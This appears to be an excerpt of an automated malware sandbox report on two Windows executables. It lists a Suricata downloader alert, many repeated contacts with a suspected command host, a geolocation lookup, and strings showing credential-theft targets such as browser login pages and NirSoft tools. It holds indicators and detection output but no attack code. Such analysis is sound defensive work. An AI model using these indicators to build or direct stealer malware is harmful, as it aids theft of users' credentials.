                      Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49736 -> 178.237.33.50:80
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,8_2_0041B411
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: DGlxtFUfY.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                      Source: DGlxtFUfY.exe, 00000010.00000002.2263636902.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                      Source: DGlxtFUfY.exe, 00000010.00000002.2263636902.0000000000B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
                      Source: DGlxtFUfY.exe, 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                      Source: DGlxtFUfY.exe, 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                      Source: LdSbZG1iH6.exe, DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, bhvD3AB.tmp.16.drString found in binary or memory: http://geoplugin.net/json.gp
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, LdSbZG1iH6.exe, 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, LdSbZG1iH6.exe, 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, LdSbZG1iH6.exe, 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: DGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpaf
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://ocsp.digicert.com0:
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://ocsp.digicert.com0H
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://ocsp.digicert.com0I
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://ocsp.digicert.com0Q
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://ocsp.msocsp.com0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://ocsp.msocsp.com0S
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://ocspx.digicert.com0E
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1990255245.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000A.00000002.2037378445.0000000002796000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://www.digicert.com/CPS0~
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
                      Source: DGlxtFUfY.exe, 00000010.00000002.2263031169.0000000000794000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                      Source: DGlxtFUfY.exe, 00000011.00000002.2259100532.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994602032.00000000058F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com(;
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
                      Source: DGlxtFUfY.exeString found in binary or memory: https://login.yahoo.com/config/login
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                      Source: bhvD3AB.tmp.16.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
